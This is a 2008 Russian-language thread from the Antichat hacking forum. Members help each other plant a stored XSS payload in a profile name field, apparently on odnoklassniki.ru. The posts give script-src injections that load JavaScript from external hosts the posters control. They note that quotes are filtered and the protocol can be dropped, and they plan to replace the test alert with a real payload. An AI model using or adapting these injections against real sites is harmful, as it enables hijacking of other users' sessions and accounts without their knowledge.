ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.04.2008, 18:53
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
Провел на форуме:
2382453
Репутация:
354
|
|
А можешь плиз у него спросить?
кеша щас нет в сети
|
|
|
14.04.2008, 18:54
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
Провел на форуме:
2382453
Репутация:
354
|
|
а про инфрейм это правильная мысль
|
|
|
|
14.04.2008, 19:32
|
|
Участник форума
Регистрация: 02.03.2008
Сообщений: 111
Провел на форуме:
130720
Репутация:
6
|
|
а поподробнее можно про инфрейм, как это реализуется?
|
|
|
|
15.04.2008, 10:55
|
|
Участник форума
Регистрация: 02.03.2008
Сообщений: 111
Провел на форуме:
130720
Репутация:
6
|
|
ну в общем сделал скрипт поместил его в поле имени,захожу на свой форум пытаюсь написать сообщение и пропало поле ввода...подробнее об xss на odnoklassniki.ru можно прочитать http://video.antichat.ru/file259.html
скрипт выглядит вот так <script src="www.avlo.freevar.com/1.js"></script>
|
|
|
|
15.04.2008, 11:59
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши:
alert("XSS");
и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 15.04.2008 в 12:14..
|
|
|
|
15.04.2008, 15:01
|
|
Участник форума
Регистрация: 02.03.2008
Сообщений: 111
Провел на форуме:
130720
Репутация:
6
|
|
Сообщение от Scipio
в поле ваше имя вводи: <script src=http://stranica.narod.ru/1.js></script>
в 1.js напиши:
alert("XSS");
и пробуй, если алерт вылетит, то все работает, потом просто изменишь 1.js как тебе нужно и все
т.е. смысл как я понимаюв том что кавычки фильтруются, и протокол ты не указал
Сделал как ты сказал,но алерт не вышел, но вот почему не знаю....вот в если в поле имени поставить <script>alert(/test/)</script> то алерт вылетает....мдяяяя дела...
|
|
|
|
15.04.2008, 15:03
|
|
Участник форума
Регистрация: 02.03.2008
Сообщений: 111
Провел на форуме:
130720
Репутация:
6
|
|
В поле имени стоит <script src="www.avlo.freevar.com/1.js"></script> в 1.js написано alert(/tets/);
не срабатывает =(( когда хочешь добавить сообщение когда должен срабатывать скрипт до появляется надпись добавить сообщение и усё...ни поля,ни фига....
|
|
|
|
15.04.2008, 15:04
|
|
Участник форума
Регистрация: 02.03.2008
Сообщений: 111
Провел на форуме:
130720
Репутация:
6
|
|
а протокол не умещается написать)))))
|
|
|
|
15.04.2008, 15:08
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
http://www.avlo.freevar.com/1.js
Пишет файл не найден, ты уверен что ты туда его положил?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
15.04.2008, 15:15
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548
Репутация:
1942
|
|
хост дерьмовый, у него быввают заскоки.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
